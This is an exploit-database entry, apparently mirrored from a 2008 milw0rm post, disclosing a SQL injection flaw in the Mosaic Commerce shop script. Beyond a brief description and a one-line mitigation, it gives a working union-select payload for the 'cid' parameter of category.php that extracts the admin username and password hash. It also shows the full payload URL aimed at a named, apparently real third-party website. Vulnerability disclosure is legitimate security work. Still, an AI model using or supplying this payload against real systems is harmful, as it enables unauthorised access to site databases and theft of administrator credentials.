header-logo
Suggest Exploit
vendor:
Mosaic Commerce
by:
Ali Abbasi
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Mosaic Commerce
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Mosaic Commerce SQL Injection Vulnerability

An SQL injection vulnerability exists in Mosaic Commerce, which allows an attacker to gain access to the admin username and password hash. This is done by sending a maliciously crafted HTTP request to the category.php page, with the cid parameter set to a malicious SQL statement.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

 Mosaic Commerce SQL Injection Vulnerability
Discovered By Ali Abbasi[abbasi[At]ustmb.ac.ir]
Mazandaran University Of Science And Technology
Network Security Research Center
Babol, Iran
http://cyber-defence.com
Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )
 
 
  {SQL BUG}
  /mosaic-path/category.php?cid=[SQL]
 
  Exploit For Get Admin Username And Password Hash:
  category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*
 

Example:

http://www.coppermax.com/category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*

# milw0rm.com [2008-10-16]